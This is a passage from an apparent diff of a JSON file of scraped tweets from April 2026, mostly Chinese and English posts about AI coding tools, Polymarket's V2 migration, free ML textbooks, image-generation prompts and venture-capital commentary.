"handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。\n\n本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。\n\n我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。\n\n之前我把 Cursor 这个 loop 当成\"独立的产物 worker\"——跑批量产物(spec / outline / copy),跟 Claude / Codex 各干各的,专业分工。\n\n今天被自己打回重写。\n\nCursor 后端就有 claude-4.7 + gpt-5.5 模型,本来就能干 Claude / Codex 的活。目前感觉适合自己系统的角色是\"前置助理\"——研究 / 初稿 / 批量改 / 审计扫描这些前置部分给它跑,主线(白天我 + 夜间 Codex loop)只做最后一公里的判断和定稿。\n\n这份算力放在\"前置\"位置,给主线省 token,整个工作流的密度都拉起来。比让它孤立产物值多了。\n\n通用模式不止 Cursor:\n- ChatGPT 重度用户 → GPT-4o-mini 跑前置 → GPT-5 主线判断\n- Claude Code 重度用户 → Haiku subagent 跑前置 → Opus 主线判断\n- 任何多模型工作流 → 把便宜模型放在贵模型主线之前\n\n把贵的留在最后一公里。\n\n5/31 之前还有 32 天。接下来我计划逐渐让它融入我的主要工作流程。", + "url": "https://x.com/runes_leo/status/2049477802978664657", + "published_at": "2026-04-29T13:16:00+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Github and critical work are becoming incompatible", + "url": "https://x.com/soumithchintala/status/2049475649157374146", + "published_at": "2026-04-29T13:07:26+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。\n\n建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: \nhttps://t.me/+ZCnxv1CA0u5jMmU1", + "url": "https://x.com/0xAA_Science/status/2049462724216987766", + "published_at": "2026-04-29T12:16:05+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"A decade ago, AI was supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is a task, not a job, and when the task gets cheaper, demand for the job grows.\"", + "url": "https://x.com/ylecun/status/2049456071278747804", + "published_at": "2026-04-29T11:49:39+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Polymarket V2 cutover 24 小时观察。\n\n把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。\n\n---\n\n【数据层】@lnkybtc 秋田老师的链上数据最直观:\n\n• V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址\n• 6 小时内,PM TVL 4.5 亿里有 2 亿(40%)转成了 pUSD\n• 利息原本上交 Circle,现在 PM 自己拿——2028 大选 4% 年化补贴的资金来源问题解决了\n• 但代价是:链上协议独立性解除,pUSD 和 PM 链下信用强绑定(V1 时代你能自己 merge 回 USDC,PM 停摆也不影响)\n\n---\n\n【实操层】我自己社群(http://t.me/runesgang)24h 真实痛点:\n\n技术派:\n• \"V2 的 SDK 识别不到 pUSD\"\n• \"前端已经 pusd 了,后端 redeem 还是 usdce\"——前后端口径不一致\n• merge() 老仓位还得走 USDC.e 中转,不能直接出 pUSD\n\n困惑派:\n• \"这个 pusd 到底是干嘛的我都搞不懂了\"\n• \"非包装一层 pusd 有啥好处\"\n• \"那这 V2 升的点用没有\"\n\n少数正面:\n• \"V2 跑起来感觉好多了\"(撮合延迟、签名都顺了)\n\n---\n\n【判断】\n\n工程方向是对的(pUSD 原生化 + EIP-712 标准化 + 砍掉 nonce 攻击面),产品节奏猛了点——从公告到强制迁移 < 72h。\n\n链上数字漂亮(4 小时 1.7 亿 pUSD),社群一片懵逼(\"包一层有啥好处\"),中间差着几天工程消化期。\n\n官方有这个动作,搞策略的顺着规则走——该调整就调整,正常推进策略迭代,后续持续关注变化。\n\nhttps://polymarket.com/?r=tgpublic&via=runes-leo&utm_source=x&utm_content=v2-cutover-observation&v…", + "url": "https://x.com/runes_leo/status/2049450372285046792", + "published_at": "2026-04-29T11:27:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic ships changelogs. OpenAI ships vibes.", + "url": "https://x.com/runes_leo/status/2049438052310020226", + "published_at": "2026-04-29T10:38:03+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二,\"终端 → 开发环境平台\"这个转型挺有意思。Cursor 从编辑器起家往下卷,Warp 从终端起家往上走,两边都在做同一件事:把 IDE、终端、Agent 折叠成一个东西。\n\n第三,开放接入别人的 Agent 是聪明的一手。自己内置一套,但承认你可能更想用 Claude Code 或者 Codex。开门做,比关门打有意思。\n\n对个人开发者来说,以前的标配是 iTerm + Cursor + Claude Code 三件套来回切,现在一个 Warp 就够了。\n\nhttp://github.com/warpdotdev/warp", + "url": "https://x.com/bozhou_ai/status/2049436870963085429", + "published_at": "2026-04-29T10:33:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Machine Learning Part 2(Kevin Murphy):概率视角下的 ML 高级篇\nhttps://probml.github.io/pml-book/book2.html\n\n【深度学习】\n\n4. Deep Learning(Goodfellow/Bengio/Courville):业内俗称\"花书\"\nhttps://www.deeplearningbook.org/\n\n5. Understanding Deep Learning(Simon Prince):2025 新版,配 Python notebook,比花书更新更友好\nhttps://udlbook.github.io/udlbook/\n\n【强化学习】\n\n6. Reinforcement Learning: An Introduction(Sutton & Barto):RL 圣经,做 Agent 必看\nhttp://incompleteideas.net/book/the-book-2nd.html\n\n7. Distributional Reinforcement Learning:第一本系统讲分布式 RL 的教材\nhttps://www.distributional-rl.org/\n\n8. Multi-Agent Reinforcement Learning:多 Agent 协作完整入门\nhttps://www.marl-book.com/\n\n【应用与工程】\n\n9. Foundations of Computer Vision(Torralba 等):现代 CV 全景图\nhttps://visionbook.mit.edu/\n\n10. Machine Learning Systems:ML 模型的系统工程化\nhttps://mlsysbook.ai/\n\n11. Machine Learning in Production:从模型到真正的产品\nhttps://mlip-cmu.github.io/book/\n\n12. Fairness and Machine Learning:AI 公平性问题\nhttps://fairmlbook.org/\n\n啃下来需要一点数学和编程基础。如果你只是想\"了解 AI\",这些书太硬,去找科普书更合适。但要真搞懂 AI 是怎么回事的人,看这些比看 100 篇科普文章都管用。", + "url": "https://x.com/bozhou_ai/status/2049436668663390575", + "published_at": "2026-04-29T10:32:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker 该有的样子。", + "url": "https://x.com/runes_leo/status/2049423498494566836", + "published_at": "2026-04-29T09:40:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", + "url": "https://x.com/dingyi/status/2049423162933395583", + "published_at": "2026-04-29T09:38:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.", + "url": "https://x.com/paulg/status/2049419661855338641", + "published_at": "2026-04-29T09:24:58+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", + "url": "https://x.com/CuiMao/status/2049397079177592925", + "published_at": "2026-04-29T07:55:14+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "x.com/i/article/204921670329…", + "url": "https://x.com/CuiMao/status/2049394392776290573", + "published_at": "2026-04-29T07:44:33+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", + "url": "https://x.com/CuiMao/status/2049369313547800804", + "published_at": "2026-04-29T06:04:54+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", + "url": "https://x.com/lxfater/status/2049368609193926810", + "published_at": "2026-04-29T06:02:06+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火力打内容 💡\n\n这种活动本质是用内容换影响力再变现。不用每天盯着链上烧 Gas,也不用拼资金体量,持续输出好内容慢慢把排名做上去就行 ⚡ 而且 Tria 背靠 Hyperliquid 和 Aptos,近期上了永续合约和收益产品,Mindo 又是 AI 热点,两个合在一起创作素材很充裕,叙事空间够大 🎁\n\n建议想参与的创作者多结合产品最新动态做内容增量,交互上优先做一次操作长尾生效的任务,别分散精力去追全部。控制节奏,这个活动的长尾收益会比看起来更可观 👀", + "url": "https://x.com/chuxiaeth/status/2049351176433623539", + "published_at": "2026-04-29T04:52:50+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我就知道🤣🤣🤣", + "url": "https://x.com/dingyi/status/2049335171066061234", + "published_at": "2026-04-29T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演示的视频,要求运镜丝滑\n\n注册体验领积分👉https://flowith.io?inv=TIECHUIREN,喜欢的可以试试", + "url": "https://x.com/lxfater/status/2049329956153352499", + "published_at": "2026-04-29T03:28:30+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https://flowith.io?inv=TIECHUIREN\n\n图片和视频提示词都在下一条👇", + "url": "https://x.com/lxfater/status/2049329950495310198", + "published_at": "2026-04-29T03:28:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年\n\n这条链路怎么跑起来,看我下面细细说来👇", + "url": "https://x.com/lxfater/status/2049329944052859141", + "published_at": "2026-04-29T03:28:28+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", + "url": "https://x.com/dingyi/status/2049304499093946475", + "published_at": "2026-04-29T01:47:21+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", + "url": "https://x.com/gkxspace/status/2049302176900501544", + "published_at": "2026-04-29T01:38:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest in cash so you control dilution.\"\n\nTo what extent is SBC the crux of the problem and has it ever been a better time to be a founder or operator given this @honam @infoarbitrage @paulbonnet @markpinc", + "url": "https://x.com/HarryStebbings/status/2049298621951058341", + "published_at": "2026-04-29T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: - Comey indicted for tweeting a number.\n- Trump FCC threatens ABC's broadcast license.\n- Trump defacing more govt institutions with his name and picture.\n- Trump's kids cashing in on huge govt contracts.\n\nI'm always torn on whether to speak up on the daily drumbeat of Trump's creepy, corrupt, Putin-style authoritarianism. \n\nOn the one hand, this has become so standard under Trump, and everyone's opinions on him have long hardened, so why bother? Just keep your head down, post on economic policy (what happened to Econ Twitter?), and don't be distracted by the daily news cycle outrages. That's the standard position in DC policy circles.\n\nOn the other hand, isn't this defeatist passivity how authoritarianism thrives? Government actions that would have induced a nationwide backlash 15 years ago are now just the day's background noise. So the bar moves.\n\nIt’s a familiar path: Most authoritarian nations moved there gradually yet persistently - the govt commits some outrages, waits for the public to get used to it and stop complaining, and then pushes for the next round. Authoritarian governments count on the population having a short attention span while they steadily boil the frog. But when you think about how far Trump has pushed just in the last 15 months, it’s fair to wonder where we'll be after the next 33 months of his term.\n\nSo I’ve been torn - speaking up a lot during the ICE protests, then just focusing on econ for many weeks. I don’t want to bore people who’ve all made up their minds on what is happening in this country - and I've been trying to spend less time on this toxic hellsite for my own mental health.\n\nBut I also think us trying to be all cool and above-the-fray is exactly what gives the administration the green light to once again push harder towards corrupt, statist, personality-cult Putinism. I don’t really have an answer here. Although this being Twitter, I’m sure that any possible approach (whether passive, hair-on-fire, or in-between) will inevitably get me yelled at here.", + "url": "https://x.com/ylecun/status/2049290206923382906", + "published_at": "2026-04-29T00:50:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", + "url": "https://x.com/svwang1/status/2049289806241550791", + "published_at": "2026-04-29T00:48:58+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", + "url": "https://x.com/lxfater/status/2049278935897186512", + "published_at": "2026-04-29T00:05:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "published_at": "2026-04-29T00:05:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on this history https://www.youtube.com/watch?v=9B4kkaGOozA&t=3891s", + "url": "https://x.com/ylecun/status/2049272044504936685", + "published_at": "2026-04-28T23:38:23+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", + "url": "https://x.com/dingyi/status/2049262208241332358", + "published_at": "2026-04-28T22:59:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dragged down in organizations full of B and C players.\"\n\nCan you have a team of only A players @Carles_Reina @rabois @bhalligan @GuptaRK22", + "url": "https://x.com/HarryStebbings/status/2049253323329704378", + "published_at": "2026-04-28T22:24:00+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", + "url": "https://x.com/svwang1/status/2049252535689757003", + "published_at": "2026-04-28T22:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the World Models workshop.\n- Dual Perspectives on non-Contrastive SSL https://arxiv.org/abs/2507.01028: Presented as a poster.\n-> I’m already working on two follow-ups to these, so stay tuned for more on that 😉\n\nI was genuinely impressed by the quality of the discussions during the poster sessions. A huge thanks to everyone who stopped by our poster to debate the details, and to those who attended the talk 🙏\nI’m leaving Rio with a lot of new research ideas and potential collaborations. This week really made my motivation to keep pushing papers and staying active in the community even stronger for the rest of my PhD 🚀\n\nAnother highlight was the socials, specifically the @amilabs mixer. It was exciting to see AMI’s first official public event go so well—it definitely felt like we put AMI “on the map” for a lot of people.\n\nThanks again to my co-authors 🙏:\n- EB-JEPA: @randall_balestr, @megdrv, @DavidJFan, @garridoq_, @TusharNagarajan, @koustuvsinha, @kevinghstz , Mike Rabbat, @ylecun, @_amirbar\n- Dual Perspectives on NC-SSL: Jean Ponce, @MichaelArbel, Martial Hebert", + "url": "https://x.com/ylecun/status/2049241361266684288", + "published_at": "2026-04-28T21:36:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Very specialised in what they want. Not nearly big enough demand side for the supply of venture backed companies. \n\n3. Private Equity: More closed than ever. Thoma, Francisco, Clearlake are on a portfolio of zombies that will likely follow the same fate as Medallia. Will cause them to pull back significantly from SaaS M&A. \n\nThis is not good.", + "url": "https://x.com/HarryStebbings/status/2049237538901020767", + "published_at": "2026-04-28T21:21:16+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe companies that win will rebuild with AI in mind, not layer it onto old structures.\"\n\nWhat role does not exist today but will be common in 5 years time @karrisaarinen @benioff @levie @dharmesh", + "url": "https://x.com/HarryStebbings/status/2049224886128722345", + "published_at": "2026-04-28T20:31:00+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initial system in 2006, which provided a huge leap forward in quality because it used a much larger 5-gram language model trained on trillions of words of text (indeed, probably the first trillion token language model training in the world: paper has some nice heads showing scaling-law-like quality improvement from scaling to more data/compute).\n\nSee \"Large Language Models in Machine Translation\", Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och and Jeffrey Dean, https://aclanthology.org/D07-1090/\n\nThe second major collaboration was in 2016 when we moved Translate over from a statistical machine translation approach to using deep neural networks.  This approach relied on two key innovations.  The first was Google's work on Sequence-to-Sequence models (https://arxiv.org/abs/1409.3215).  The second was our development of TPUs, custom cups that improved the performance of inference for deep neural networks by 30-80X over existing CPUs and GPUs of the day (and reduced latency by 15-30X).  This made launching compute-intensive language model services like Translate feasible for hundreds of millions of users. See \"In-Datacenter Performance Analysis of a Tensor Processing Unit\",  Norman P. Jouppi et al.  https://arxiv.org/abs/1704.04760\n\nGNMT paper:\n\"Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation\",  Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean, https://arxiv.org/abs/1609.08144\n\nMost recently, we have advanced Translate further using Gemini models.\n\nEach of these advances relied on research that have major quality leaps over the existing status quo translation approaches, bringing better quality and connectedness to all of our Translate users! 🎉", + "url": "https://x.com/JeffDean/status/2049221200321380805", + "published_at": "2026-04-28T20:16:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", + "url": "https://x.com/CuiMao/status/2049198015232315465", + "published_at": "2026-04-28T18:44:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So good!", + "url": "https://x.com/dingyi/status/2049171494329065493", + "published_at": "2026-04-28T16:58:50+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "我现在基本不太直接用 Agent了。\n介绍下我的AI 搭档,Finn。\n现在大部分情况是 Finn 让 Agent 去干活。\n\n工作流其实挺简单的:\n我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。\n\n然后直接丢给 OpenClaw,后面基本就不太管了\n\n这一步挺关键的。\n\n不然你会发现一个很烦的事情:\n你要跟一堆 Agent 来回对话,有时候都找不到有那个 MD 的文件夹在哪,很快就乱了。\n\n换了这种模式后我现在基本只做一件事:提需求\n\n剩下的 Finn 自己去搞,他会先跟我确认好需求,就安排其他 Agent 去干了。\n\n而且我已经把一整套东西接进来了,Obsidian、Google Workspace、iCloud、飞书、github、Cloudflare 等,各种表格和自动化流程。\n\n如果你还在一个个 Agent 聊天,其实有一个悖论,以为自己在用 AI,但本质上只是换了一套更聪明的工具。\n\n安全我也跑了一段时间,我现在的做法挺克制的:白名单 + 审计 + 能力边界,不给乱权限,主要让它长期跑那些稳定的事情。\n\n目前看,是稳的。\n\n有一个很直观的变化,这套东西一旦跑顺了,真的很难再回去什么都自己聊自己盯。\n\n比如最近我用 Codex 对好了将近一年的烂账,然后形成了一个固定的 skill 交给了 OpenClaw,现在跟他说一句,就能把所有的表填的明明白白,还能在固定时间盘点,发邮件。\n所以 Finn 现在是我的私人助理,财务总监,技术总监等角色集大成者。", + "url": "https://x.com/frxiaobei/status/2049170782170042513", + "published_at": "2026-04-28T16:56:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。\n\nhttps://poolside.ai/", + "url": "https://x.com/dingyi/status/2049166818452160778", + "published_at": "2026-04-28T16:40:15+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "现在远程面试可以更干脆了。\n\n面试官当甲方出需求,\n应聘者打开 Codex / Claude Code,\n直接共享屏幕开始干。\n\n半小时什么都看清了。", + "url": "https://x.com/frxiaobei/status/2049158565487935850", + "published_at": "2026-04-28T16:07:28+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad.\n\nComet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet alongside the apps you already use.\n\nAvailable now on the App Store.", + "url": "https://x.com/AravSrinivas/status/2049157990604025896", + "published_at": "2026-04-28T16:05:11+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "雷老板是懂营销的,\n\n本着拿人 token,替人带货的原则,\n\n替 Xiaomi MiMo 喊个话。", + "url": "https://x.com/frxiaobei/status/2049155099071750164", + "published_at": "2026-04-28T15:53:41+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "R to @AravSrinivas: reddit.com/r/GeminiAI/commen…", + "url": "https://x.com/AravSrinivas/status/2049151356985040934", + "published_at": "2026-04-28T15:38:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind 